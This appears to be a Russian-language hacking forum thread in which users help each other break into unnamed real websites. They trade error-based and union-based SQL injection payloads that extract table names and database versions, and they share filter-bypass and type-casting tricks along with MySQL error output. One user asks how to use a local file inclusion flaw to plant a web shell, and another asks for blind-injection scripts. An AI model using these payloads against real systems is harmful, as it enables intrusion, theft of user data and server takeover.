site.com/2.php?id=6+or(1,2)=(select*from(select name_const((select table_name from information_schema.tables limit 17,1),1),name_const((select table_name from information_schema.tables limit 17,1),1))a) or site.com/2.php?id=6 union select * from(select * from(select name_const((select table_name from information_schema.tables limit 17,1), 11)d) as t join (select name_const((select table_name from information_schema.tables limit 17,1), 11)e) b)a
Имеется локальный инклуд. С нул байтом. Цель - залить шелл. На портале нет ни форума, ни блога - там где можна залить какую либо картинку и потом ее приинклудить. Нужна помощь... подкиньте идейку, как заинклудить шелл)
уже два дня мучаюсь ((, тут как поступит? Привожу варианты: http://site.net/script.php?seeking_sex=1' 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13 http://site.net/script.php?seeking_sex=1') 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13 http://site.net/script.php?seeking_sex=1' order by 1-- 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order b' ) AND (user_master.seeking_sexuality like '2' OR user_master' at line 13 тут одинаков ответ: http://site.net/script.php?seeking_sex=1') order by 1-- 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13 http://site.net/script.php?seeking_sex=1') order by 1000-- 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) AND (user_master.seeking_sexuality like '2' OR user_master.seekin' at line 13 тока на: http://site.net/script.php?seeking_sex=1'' order by 1-- норм стр но на: http://site.net/script.php?seeking_sex=1'' order by 1000-- ответ тоже норм стр (( Как можно решит тут? floor не помог Заранее благодарен PS. линк не палил
Многострочный запроc, а вы режете -- , используйте /*. Если не прокатит /*, то в уязвимый параметр 1') and ('1'='1. Ну и тудо же впихнуть разные вариции всего известного чтоб вытащить в ошибку | пытатцо сделать принтабельной.
спс пробовал так: http://site.net/script.php?seeking_sex=1') and ('1'='1+order by 1/* без ошибок но и без профилей а так: http://site.net/script.php?seeking_sex=-1') and ('1'='1+order by 1/* 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' OR user_master.seeking_sexuality like '%,2' OR user_mas' at line 13 http://site.net/script.php?seeking_sex=-1') OR ('1'='1+order by 1/* без ошибок но и без профилей что то не получится чтол
YuNi|[c запрос ограничен по количеству символов, а сам пытался крутить этот сайт вот тут скуль, но больше 5 символов не вставить. попробуй post передать 1' order by 10/* и увидишь результат сам голову долго ломал над этим
ну вообше то я и постом отправлял все и 1' order by 10/* тоже пробовал ничего (( Да там отрезает энное кол символов но тут скул очевиден и вот пробую разные варианты. Пока не пофиксили но и решение тоже нету ((
есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10 но и не выводит не чего...
Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))
Попробуй так http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null Возможные варианты: - не соответствует кодировка или тип данных. Тогда, пользуйся функциями приведения типов convert(version(),binary) convert(version()+using+latin1) convert(version()+using+binary) cast(version()+as+binary) cast(version()+as+int) cast(version()+as+char) и тд. Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке aes_decrypt(aes_encrypt(version(),1),1) unhex(hex(version())) Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL. - у скули нету вывода.
Redwood ты тоже посмотри на мои варианты может у тя что получится https://forum.antichat.ru/threadnav46016-1536-10.html
я пробовал по разному, если http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null то показывает абракадабру. функции приведения типов не дали не чего... что делать если у скули нет вывода? blind sql inj вроде работает, определил версию...но вывести через нее ,как я не понял
